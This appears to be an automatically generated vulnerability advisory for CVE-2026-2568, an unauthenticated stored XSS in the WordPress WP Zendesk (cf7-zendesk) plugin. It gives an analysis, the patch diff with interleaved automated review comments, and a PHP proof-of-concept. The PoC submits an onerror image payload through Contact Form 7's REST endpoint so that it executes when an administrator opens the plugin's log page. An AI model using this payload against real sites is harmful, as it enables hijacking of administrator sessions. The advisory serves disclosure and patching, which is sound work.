Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2568: WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms <= 1.1.5 – Unauthenticated Stored Cross-Site Scripting (cf7-zendesk)

CVE ID CVE-2026-2568
Plugin cf7-zendesk
Severity High (CVSS 7.2)
CWE 79
Vulnerable Version 1.1.5
Patched Version 1.1.6
Disclosed March 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2568:
The vulnerability is a stored cross-site scripting (XSS) flaw in the WP Zendesk plugin for WordPress versions up to 1.1.5. The root cause is insufficient output escaping when rendering form submission data in the plugin’s admin log viewer. The vulnerable code is in the file `cf7-zendesk/templates/log.php`. The plugin’s `vxcf_zendesk` class processes form submissions and stores entry data. This data is later displayed in the admin panel via the `log.php` template. In the vulnerable version, line 31 outputs the `$value` variable directly without escaping: `echo is_array($value) ? json_encode($value) : $value`. This allows arbitrary HTML and JavaScript embedded in a form field value to be rendered and executed when an administrator views the log page.

The attack vector is an unauthenticated form submission. An attacker can submit a crafted payload via any form integrated with the plugin (Contact Form 7, WPForms, Elementor, Formidable, Ninja Forms). The payload is stored in the plugin’s log database. When a user with administrative privileges accesses the plugin’s log page (`wp-admin/admin.php?page=vxcf_zendesk_log`), the malicious script executes in their browser session. This can lead to site takeover, data theft, or further malware injection.

The patch in version 1.1.6 adds proper output escaping. The diff changes line 31 to: `echo is_array($value) ? esc_html(json_encode($value)) : esc_html($value)`. The `esc_html()` function ensures any HTML entities are encoded before output, neutralizing the XSS payload. The patch also extracts the tag-substitution logic into a new `process_tags` method that handles array values, but the primary security fix is the escaping in the template. If exploited, this vulnerability allows unauthenticated attackers to inject persistent malicious scripts that execute in the context of an administrator, compromising the WordPress site.

Differential between vulnerable and patched code

Code Diff
--- a/cf7-zendesk/cf7-zendesk.php
+++ b/cf7-zendesk/cf7-zendesk.php
@@ -2,7 +2,7 @@
 /**
 * Plugin Name: Contact Form 7 Zendesk
 * Description: Integrates Contact Form 7, <a href="https://wordpress.org/plugins/contact-form-entries/">Contact Form Entries Plugin</a> and many other forms with Zendesk allowing form submissions to be automatically sent to your Zendesk account
-* Version: 1.1.5
+* Version: 1.1.6
 * Requires at least: 3.8
 * Author URI: https://www.crmperks.com
 * Plugin URI: https://www.crmperks.com/plugins/contact-form-plugins/contact-form-zendesk-plugin/
@@ -24,7 +24,7 @@
   public  $crm_name = "zendesk";
   public  $id = "vxcf_zendesk";
   public  $domain = "vxcf-zendesk";
-  public  $version = "1.1.5";
+  public  $version = "1.1.6";
   public  $update_id = "6000015";
   public  $min_cf_version = "1.0";
   public $type = "vxcf_zendesk";
@@ -108,18 +108,7 @@
   add_action('init', array($this,'init'));
        //loading translations
 load_plugin_textdomain('contact-form-zendesk-crm', FALSE,  $this->plugin_dir_name(). '/languages/' );
-
-  self::$db_version=get_option($this->type."_version");
-  if(self::$db_version != $this->version && current_user_can( 'manage_options' )){
-  $data=$this->get_data_object();
-  $data->update_table();
-  update_option($this->type."_version", $this->version);
-  //add post permissions
-  require_once(self::$path . "includes/install.php");
-  $install=new vxcf_zendesk_install();
-  $install->create_roles();
-
-  }
+$this->maybe_install(true);
 }

   }
@@ -139,6 +128,31 @@
 self::$plugin->instance();
 }
 } }
+  /**
+  * create tables and roles
+  *
+  */
+public function maybe_install($version_check=false){
+
+  if(current_user_can( 'manage_options' )){
+  self::$db_version=get_option($this->type."_version");
+     $do_install=false;
+      if($version_check == false){
+        $do_install=true;
+      }else if(self::$db_version != $this->version){
+        $do_install=true;
+      }
+  if($do_install){
+  $data=$this->get_data_object();
+  $data->update_table();
+  update_option($this->type."_version", $this->version);
+  //add post permissions
+  require_once(self::$path . "includes/install.php");
+  $install=new vxcf_zendesk_install();
+  $install->create_roles();
+  }
+  }
+}

 public function form_submitted($form){

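Review bot: `maybe_install` relies on loose comparison in both branches: `$version_check == false` accepts any falsy value, and `self::$db_version != $this->version` compares numeric-looking version strings numerically, so a future pair such as "1.10" against "1.1" (constructed example) would compare equal and skip the upgrade. Declare the parameter and return (`public function maybe_install(bool $version_check = false): void`) and collapse the branch to `$do_install = !$version_check || self::$db_version !== $this->version;`. The docblock says only "create tables and roles"; add `@param bool $version_check when true, run the install only if the stored option differs from $this->version` so the knob passed at the `init`-time call site `$this->maybe_install(true);` in the earlier hunk is documented. The same loose comparison existed in the removed `install()` method, so this is carried over rather than introduced.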
@@ -208,18 +222,17 @@
   $val=$uploaded_files[$name];
    }

-   if( !empty($val) && isset($v['basetype']) && $v['basetype'] == 'mfile' && function_exists('dnd_get_upload_dir') ){
+  if( !empty($val) && isset($v['basetype']) && $v['basetype'] == 'mfile' && function_exists('dnd_get_upload_dir') ){
       $dir=dnd_get_upload_dir();
      $f_arr=array();
       foreach($val as $file){
-     $file_name=explode('/',$file);
+     $file_name=explode('/',$file);
      if(count($file_name)>1){
-      $f_arr[]=$dir['upload_url'].'/'.$file_name[1];
+      $f_arr[]=$dir['upload_url'].'/'.end($file_name);
      }
-      }
-
+      }
    $val=$f_arr;
-   }
+   }
     if(!isset($uploaded_files[$name])){
      $val=wp_unslash($val);
     }
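Review bot: `end($file_name)` now takes the last path segment where the old code hard-coded index 1; `basename($file)` states the same intent in one call and also copes with a trailing slash, where `explode` leaves an empty last element. The `foreach($val as $file)` loop assumes `$val` is an array, and the `!empty($val)` guard on the line above does not establish that, so a scalar value would raise a warning — presumably `mfile` fields always carry arrays, but an `is_array($val)` term in the condition would make that explicit. The enclosing function begins outside this hunk.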
@@ -500,27 +513,6 @@
   }


-  /**
-  * create tables and roles
-  *
-  */
-  public function install(){
-
-  if(current_user_can( 'manage_options' )){
-  self::$db_version=get_option($this->type."_version");
-  if(self::$db_version != $this->version){
-  $data=$this->get_data_object();
-  $data->update_table();
-  update_option($this->type."_version", $this->version);
-  //add post permissions
-  require_once(self::$path . "includes/install.php");
-  $install=new vxcf_zendesk_install();
-  $install->create_roles();
-
-  }
-
-  }
-  }
 /**
 * Contact Form status
 *
@@ -1268,6 +1260,7 @@
   */
   public function activate(){
 $this->plugin_api(true);
+$this->maybe_install();
 do_action('plugin_status_'.$this->type,'activate');
   }
     /**
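Review bot: `activate()` now delegates to `maybe_install()`, whose body is gated on `current_user_can('manage_options')`; if activation runs without a logged-in user (a WP-CLI or programmatic activation, inferred from the hook name), that gate fails and table/role creation silently does not happen until the later `init`-time call. The removed `install()` had the same gate, so this is inherited rather than new, but the activation hook is the one place where setup is expected to run unconditionally. At minimum, document the deferral at the call: `$this->maybe_install(); // no-op without manage_options; init re-checks the stored version`.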
@@ -1775,16 +1768,7 @@
   if(!empty($v)){ //if value not empty
       if($this->post('type',$v) == "value"){ //custom value
       $value=trim($this->post('value',$v));
-  //starts with { and ends } , any char in brackets except {
-  preg_match_all('/{[^{]+}/',$value,$matches);
-  if(!empty($matches[0])){
-      $vals=array();
-   foreach($matches[0] as $m){
-       $m=trim($m,'{}');
-    $vals['{'.$m.'}']=$this->verify_field_val($entry,$m);
-   }
-  $value=str_replace(array_keys($vals),array_values($vals),$value);
-  }
+$value=$this->process_tags($entry,$value);

   }else{ //general field
   $field=$this->post('field',$v);
@@ -1941,6 +1925,22 @@
 }
   return array("msg"=>$notice,"class"=>$screen_msg_class);
 }
+  public function process_tags($entry,$value){
+  //starts with { and ends } , any char in brackets except {
+  preg_match_all('/{[^{]+}/',$value,$matches);
+  if(!empty($matches[0])){
+      $vals=array();
+   foreach($matches[0] as $m){
+       $m=trim($m,'{}');
+   $val_cust=$this->verify_field_val($entry,$m);
+   if(is_array($val_cust)){ $val_cust=trim(implode(' ',$val_cust)); }
+   $vals['{'.$m.'}']=$val_cust;
+   }
+
+  $value=str_replace(array_keys($vals),array_values($vals),$value);
+  }
+  return $value;
+}

   /**
   * Send error email
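Review bot: `str_replace` with array arguments applies each search/replace pair in sequence over the already-rewritten string, so an expanded field value that itself contains text like `{other}` matching a later key in `$vals` is substituted again; since these values originate from form submissions, `$value=strtr($value,$vals);` (single pass) is the safer form of the second-to-last statement. `implode(' ',$val_cust)` also emits an "Array to string conversion" warning and yields the literal `Array` for nested arrays, if `verify_field_val` can return those — cannot tell from this hunk. The method has no docblock; `@param array $entry stored entry, @param string $value template containing {field} tags, @return string expanded value` would cover it.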
--- a/cf7-zendesk/templates/log.php
+++ b/cf7-zendesk/templates/log.php
@@ -28,7 +28,7 @@
 ?>
 <div class="entry_row">
 <div class="entry_col1 vx_label"><span title="<?php echo esc_attr($k) ?>"><?php echo esc_html($label); ?></span></div>
-<div class="entry_col2"><?php  echo is_array($value) ? json_encode($value) : $value ?></div>
+<div class="entry_col2"><?php  echo is_array($value) ? esc_html(json_encode($value)) : esc_html($value) ?></div>
 <div class="crm_clear"></div>
 </div>
 <?php
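Review bot: wrapping both branches in `esc_html()` is the correct context for element content; the remaining gap is that `json_encode()` returns `false` on non-UTF-8 input, and `esc_html(false)` then renders an empty cell with no indication that anything was there. `wp_json_encode($value)`, WordPress's wrapper that retries with sanitised strings on encoding failure, is the more robust call here: `echo is_array($value) ? esc_html(wp_json_encode($value)) : esc_html($value)`. The enclosing loop of the template starts outside this hunk.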

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2568 - WP Zendesk for Contact Form 7, WPForms, Elementor, Formidable and Ninja Forms <= 1.1.5 - Unauthenticated Stored Cross-Site Scripting
<?php
// Proof-of-concept submission script for the stored XSS described above.
// Flow: build a Contact Form 7 submission whose text field carries an HTML
// payload, POST it to the form's feedback endpoint, and report the HTTP status.
// Nothing here verifies that the payload executed; the advisory's log template
// (cf7-zendesk/templates/log.php, line 31) is where it would be rendered.
$target_url = 'https://vulnerable-site.com/'; // CHANGE THIS
// This PoC assumes a Contact Form 7 form is present and integrated with the vulnerable plugin.
// The form ID must be known. Replace '123' with the actual form ID.
$form_id = 123;
// Craft a payload that will be stored and executed in the admin log.
// Pre-1.1.6 log.php echoes the stored value unescaped; 1.1.6 wraps it in
// esc_html(), which is what neutralises this payload.
$payload = '<img src=x onerror=alert(document.cookie)>';
// Target the WordPress front-end form submission handler.
$submit_url = $target_url . '/wp-json/contact-form-7/v1/contact-forms/' . $form_id . '/feedback';
// Alternatively, if REST API is disabled, target the form's POST endpoint directly.
// $submit_url = $target_url . '/?wpcf7-form=' . $form_id;
// Form body: CF7's hidden bookkeeping fields (_wpcf7*) plus the visible inputs.
// 'your-email' / 'your-message' are the names from CF7's default form template;
// a customised form may use different names.
$data = array(
    'your-email' => 'attacker@example.com',
    'your-message' => $payload, // Inject payload into a text field.
    '_wpcf7' => $form_id,
    '_wpcf7_version' => '5.7',
    '_wpcf7_locale' => 'en_US',
    '_wpcf7_unit_tag' => 'wpcf7-f' . $form_id . '-p1-o1',
    '_wpcf7_container_post' => '0'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); // application/x-www-form-urlencoded body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body rather than printing it
// Certificate verification is disabled below; that exposes this request itself
// to interception and must not be carried into any real tooling.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch); // false on transport error; never inspected below
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// A 200 only means the endpoint answered; $response is not examined, so this
// does not establish that the value was accepted or stored.
// Loose == is harmless here: curl_getinfo(CURLINFO_HTTP_CODE) returns an int.
if ($http_code == 200) {
    // NOTE(review): the trailing "n" in both echo strings looks like an
    // extraction-mangled "\n"; in the else branch it also turns the variable
    // into the undefined $http_coden.
    echo "Payload submitted. Check admin log at: " . $target_url . "/wp-admin/admin.php?page=vxcf_zendesk_logn";
} else {
    echo "Submission failed. HTTP code: $http_coden";
}
?>
